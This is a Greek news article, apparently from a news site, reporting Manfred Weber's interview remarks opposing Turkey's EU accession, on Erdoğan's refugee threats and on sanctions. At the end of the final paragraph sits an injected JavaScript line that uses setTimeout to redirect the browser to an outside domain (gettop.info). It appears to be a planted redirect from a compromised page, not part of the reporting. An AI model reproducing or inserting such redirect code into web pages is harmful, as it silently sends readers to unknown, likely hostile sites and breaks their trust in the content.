Βέμπερ: Όχι στην ένταξη της Τουρκίας στην ΕΕ

0
2

 

Επανέλαβε τις απόψεις του για τη θέση της Τουρκίας στην ΕΕ ο ο κοινοβουλευτικός εκπρόσωπος του Ευρωπαϊκού Λαϊκού Κόμματος (ΕΛΚ) στο Ευρωπαϊκό Κοινοβούλιο (Ε.Κ) Μάνφρεντ Βέμπερ, σε συνέντευξή του στη Neue Osnabrecker Zeitung.

Όπως είπε ο κ. Βέμπερ: «Η Τουρκία δεν θα γίνει μέλος της Ευρωπαϊκής Ενωσης», τονίζοντας ότι είναι σημαντικότερες οι συμφωνίες με την Άγκυρα για πρακτικά βήματα σε θέματα όπως είναι η οικονομία, ο πολιτισμός και η ανταλλαγή φοιτητών. «Αυτά θα είχαν νόημα από τη δική μας σκοπιά αντί της ένταξης στην ΕΕ»».

Ο Βέμπερ απάντησε στις απειλές του Ερντογάν ότι θα ανοίξει τα σύνορα προς την Ευρώπη για τους πρόσφυγες λεγοντας: «Δεν θα επιτρέψουμε να εκβιαστούμε. Το βέβαιον είναι ότι αν παραστεί ανάγκη είμαστε σε θέση να αντιδράσουμε και ανεξάρτητα από την τουρικική κυβέρνηση«.

Ο πρόεδρος του ΕΛΚ εξέφρασε, επίσης, την επιθυμία να ακολουθήσουν τα κράτη μέλη της ΕΕ την απόφαση του Ευρωκοινοβουλίου και να παγώσουν τις ενταξιακές διαπραγματεύσεις: «Δεν μπορούμε να συνεχίσουμε σαν να μην συμβαίνει τίποτα» αν και τάχθηκε κατά του «ακτιβισμού» σε σχέση με τις οικονομικές κυρώσεις: «Τάσσομαι αυτή τη στιγμή κατά της διακοπής της οικονομικής βοήθειας και της επιβολής κυρώσεων. Οι δίαυλοι επικοινωνίας δεν πρέπει να κλείσουν, διότι οι δημοκρατικές δυνάμεις της Τουρκίας εξακολουθούν να χρειάζονται την υποστήριξη της Ευρώπης«.

Στο ερώτημα αν προτίθεται να είναι υποψήφιος για την προεδρία του Ευρωπαϊκού Κοινοβουλίου, ο Βέμπερ απάντησε: «Υπάρχει μια σειρά από καλούς υποψήφιους στην κοινοβουλευτική μας ομάδα», αλλά ο ίδιος δεν έχει τέτoιες φιλοδοξίες. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here